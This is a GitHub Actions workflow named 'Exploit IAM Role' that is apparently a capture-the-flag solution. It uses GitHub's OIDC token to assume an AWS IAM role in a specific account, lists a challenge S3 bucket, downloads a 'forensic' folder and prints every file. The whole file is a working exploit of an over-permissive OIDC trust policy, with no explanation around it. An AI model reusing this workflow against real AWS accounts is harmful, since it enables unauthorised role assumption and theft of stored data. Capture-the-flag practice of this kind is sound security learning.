name: Exploit IAM Role
on: [push]

jobs:
  exploit:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
    steps:
      - name: Checkout code
        uses: actions/checkout@v4
      
      - name: Configure AWS credentials
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::396961015104:role/imaginary-challenge
          aws-region: ap-east-1
          role-session-name: github-actions-session
      
      - name: List S3 bucket contents
        run: |
          echo "🔍 Listing S3 bucket contents..."
          aws s3 ls s3://challenge-assets-production-empasoft-ctf/ --recursive
      
      - name: Download forensic artifacts
        run: |
          echo "📥 Downloading forensic artifacts..."
          aws s3 cp s3://challenge-assets-production-empasoft-ctf/forensic/imaginary-challenge/ ./forensic/ --recursive
          ls -la ./forensic/
      
      - name: Display downloaded files
        run: |
          echo "📄 Downloaded files:"
          find ./forensic/ -type f -exec echo "File: {}" \; -exec cat {} \;